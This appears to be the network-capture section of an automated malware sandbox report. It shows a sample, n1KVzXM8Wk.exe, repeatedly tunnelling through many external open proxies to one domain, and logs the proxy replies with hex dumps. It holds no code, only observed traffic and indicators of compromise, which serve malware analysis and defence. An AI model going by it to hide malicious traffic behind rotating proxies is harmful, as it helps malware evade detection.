                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      349192.168.2.450725120.79.101.088886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.964740992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.575639963 CET59INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-agent: nginx


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      350192.168.2.450717103.148.51.1980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.968493938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      351192.168.2.45086524.249.199.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.975502968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      352192.168.2.450868184.178.172.13153116812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:19.986601114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      353192.168.2.45088272.195.114.16941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.002799988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      354192.168.2.45077661.7.183.15241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.041450024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      355192.168.2.450871109.123.254.43171796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.068001032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.739381075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.587029934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.030630112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.943938971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.835099936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834623098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.599620104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      356192.168.2.450783183.78.143.142281346812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.092866898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902808905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.211489916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740931034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.169573069 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      357192.168.2.450932159.65.77.16885856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.120260954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.275881052 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      358192.168.2.450929172.233.58.8680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.124670029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      359192.168.2.45090693.126.56.3041536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.124687910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      360192.168.2.450934184.185.2.1241456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.139956951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.680309057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      361192.168.2.450962207.178.166.187806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.161370993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.322283983 CET531INHTTP/1.1 405 Method Not Allowed
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Allow: GET,POST,OPTIONS,HEAD
                                                                                                      Content-Length: 331
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      362192.168.2.45096580.82.77.2325206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.167231083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.739382982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334760904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.443878889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.578670025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.701222897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.834990025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.037971020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      363192.168.2.451007162.159.242.159806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.197909117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.285002947 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      364192.168.2.45092694.20.183.172806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.198719978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      365192.168.2.450879183.215.23.24290916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.203310013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.583815098 CET325INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:48 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      366192.168.2.450996184.60.66.122806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.222280025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.346227884 CET1286INHTTP/1.1 302 Found
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Server: Apache/2.4.56 (Debian)
                                                                                                      Location: https://heygirlisheeverythingyouwantedinaman.com:443/index.php
                                                                                                      Content-Length: 3239
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48
                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH
                                                                                                      Feb 23, 2024 09:45:20.347877026 CET1286INData Raw: 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69
                                                                                                      Data Ascii: 9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto">
                                                                                                      Feb 23, 2024 09:45:20.349329948 CET894INData Raw: 74 65 6d 73 2e 20 57 65 20 68 61 76 65 20 64 65 76 65 6c 6f 70 65 64 20 73 65 6e 73 6f 72 20 73 79 73 74 65 6d 73 20 66 6f 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f
                                                                                                      Data Ascii: tems. We have developed sensor systems for monitoring basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moistur


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      367192.168.2.450737117.160.250.13288996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.222523928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.828969955 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      368192.168.2.450595202.162.219.1210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.223869085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      369192.168.2.450898113.143.37.8290026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
